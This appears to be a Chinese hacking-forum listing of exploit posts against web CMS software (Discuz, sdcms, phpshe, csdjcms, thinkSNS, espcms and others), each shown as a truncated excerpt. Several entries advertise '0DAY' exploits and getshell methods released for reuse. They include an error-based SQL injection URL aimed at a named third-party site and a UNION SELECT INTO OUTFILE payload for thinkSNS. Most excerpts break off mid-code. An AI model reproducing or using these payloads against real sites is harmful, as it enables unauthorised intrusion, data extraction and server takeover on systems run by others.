Web安全
最新DZ X2.5 0DAY (By saviour) 附EXP
DZ 插件注入漏洞!前几天看COG发布 但阅读权限得200 (管理员才可以查看) 刚去看了下已经公开了 所以我就转过来了Exp:http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from informatio
sdcms2.0后台绕过直接进入
By Cr4zyIslogin //判断登录的方法sub islogin()if sdcms.strlen(adminid)=0 or sdcms.strlen(adminname)=0 then dim t0,t1,t2t0=sdcms.getint(sdcms.loadcookie("adminid"),0) loadcookie t1=sdcms.loadcookie("islogin")t2=sdcms.loadcookie("loginkey")if sdcms.strlen(t0)=0 or sdcms.strlen(t1)=
phpshe v1.1 多处文件包含与SQL注射漏洞等
/*******************************************************//* Phpshe v1.1 Vulnerability/* ========================/* By: : Kn1f3/* E-Mail : [email protected]/*========================/*******************************************************//* 90sec team /*******************************
csdjcms V 3.0 getshell Vulnerability
/*******************************************************//* csdjcms < V 3.0 getshell Vulnerability/* ======================== /* By: : Kn1f3 /* E-Mail : [email protected]/*======================== /*******************************************************//* 90sec t
红头船企业网站系统HTCCMS 漏洞分析
红头船企业网站系统HTCCMS 漏洞分析BY:风之传说一年木有玩黑了,最近一个月又重新拾取。。挺想念大家。这篇文章,肯定会让大牛笑话。那就当个抛砖引玉吧。另外,由于时间关系,这个程序没有接着看。 先发一篇文章吧,我怕又被清理了。。还有,那个啥漏洞板块我发不了文章,显示是没有权限的。。。我就
代码审计:易想团购系统通杀SQL注入漏洞分析
作者:Seay 博客:http://www.cnseay.com/ 转载请保留以上信息。 刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数。 // 获取客户端IP地址function get_client_ip(){
跟风_thinkSNS
http://9.9.9.128/index.php?app=public&mod=Search&t=1&a=public&k=asd%27%29+union+select+1+into+outfile+%27c%3A%2F2.txt%27+%23爆路径index.php?act=userlist&app=widget&mod=乌云众测的,估计已经被挖滥了
thinksaas
http://xxxxxxxxxxxxx/index.php?app=witkey&ac=index&sort_industry=&sort_good_type=2over
thinksns 3 getshell
wooyun test的重测试是这程序 结果我申请没让我进 听朋友说是这个我就大概看了下 就发现个getshell反正重测那么多黑客 肯定到时候有人挖出来 还不如放出来{:6_445:} attachaction.class.phppublic function capture(){error_reporting(0);//解析上传方式$query_string=t($_SERVER);parse_str($query_st
再爆espcms 最新注入漏洞
########################################### # Team:c0deplay######################################### if (is_array($att) && count($att) > 0) { foreach ($att as $key => $value) { if ($value) { $value = $this->fun->codecon($value, 'bg'); $db_where .= ' AND b.' . $key